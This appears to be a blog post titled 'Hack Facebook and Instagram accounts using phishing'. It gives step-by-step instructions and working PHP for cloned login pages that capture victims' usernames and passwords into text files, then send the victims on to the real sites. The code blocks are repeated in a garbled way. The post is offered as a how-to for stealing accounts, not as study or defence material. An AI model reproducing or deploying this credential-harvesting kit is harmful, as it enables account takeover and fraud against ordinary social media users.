Hack Facebook and Instagram accounts using phishing
How to create a Facebook phishing page :
STEP: 1: Creation of Facebook phishing page as an example.
- Go to www.facebook .com, make sure you are not logged into Facebook account .
- Now press Right Click of mouse and save complete webpage.
- Find this action=
- And modify this code action=”login.php”
- Save this file as index.html
- Now you have to get username and password stored in a text file named facebook.txt
- Create a file named login.php using the following code.
login.php
<?php
header (‘Location: https://www.facebook .com ‘);
$handle = fopen(“facebook .txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
header (‘Location: https://www.facebook .com ‘);
$handle = fopen(“facebook .txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Step: 2 : Now, Its time to upload your files in your registered Web Host Account.
Step: 3: You can check the hacked accounts passwords by simply checking into your website url where www.yourwebsitename.com/facebook .txt
That’s it you have to for making Facebook Phishing !!
If you are facing any problem while making Facebook Phishing you can download it from below download link.
How to create a Instagram phishing page :
STEP: 1: Creation of Instagram phishing page as an example.
- Go to www.instagram.com, make sure you are not logged into Instagram account .
- Now press Right Click of mouse and save complete webpage.
- Find this <form class=”HmktE” method=”post” >
- And modify this code <form class=”HmktE” method=”post” action=”login.php”>
- Save this file as index.html
- Now you have to get username and password stored in a text file named instagram.txt
- Create a file named login.php using the following code.
login.php
<?php
header (‘Location: https://www.instagram.com ‘);
$handle = fopen(“instagram.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
header (‘Location: https://www.instagram.com ‘);
$handle = fopen(“instagram.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Step: 2 : Now, Its time to upload your files in your registered Web Host Account.
Step: 3: You can check the hacked accounts passwords by simply checking into your website url where www.yourwebsitename.com/instagram.txt
That’s it you have to for making Instagram Phishing !!
If you are facing any problem while making Instagram Phishing you can download it from below download link.
No comments:
Post a Comment